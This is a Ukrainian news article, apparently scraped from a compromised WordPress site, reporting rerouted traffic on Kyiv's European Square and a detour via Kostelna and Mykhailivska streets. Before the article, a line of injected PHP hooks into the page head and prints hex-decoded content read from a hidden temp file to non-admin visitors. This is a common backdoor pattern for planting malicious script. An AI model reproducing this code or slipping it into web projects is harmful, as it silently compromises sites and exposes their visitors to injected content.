if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Змінено дорожній рух на Європейській площі

Змінено дорожній рух на Європейській площі

Змінено режим роботи світлофорів на Європейській площі – закрито окрему фазу світлофорного регулювання для прямого проїзду з вулиці Трьохсвятительської на вулицю Грушевського.

Як повідомляє Департамент транспортної інфраструктури, таке рішення ухвалено в рамках виконання розпорядження КМДА щодо реорганізації руху автотранспорту на Подолі (організація пішохідної зони на Контрактовій площі та частині вулиці Сагайдачного).

Тепер із вулиці Трьохсвятительської на Європейській площі можна лише повернути направо на вулицю Хрещатик на зелену «стрілку» світлофора, червоне світло горить постійно.

Для здійснення проїзду з вулиці Трьохсвятительської на вулицю Грушевського необхідно здійснити об’їзд через вулицю Костельну, далі лівий поворот на вулицю Михайлівську і лівий поворот на вулицю Хрещатик – у бік Європейської площі.

Очікується, що таке рішення поліпшить проїзд із Володимирського узвозу на вулицю Хрещатик (за рахунок подовження фази зеленого сигналу світлофора).

Роботи з реорганізації дорожнього руху виконано в рамках діяльності Центру вдосконалення організації дорожнього руху та його безпеки КП «Київдорсервіс».

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Статистика сторінки:
Переглядів сьогодні:
Переглядів у поточному місяці:
Відповідальність за зміст коментарів, що залишають відвідувачі, несуть їхні автори.
Популярне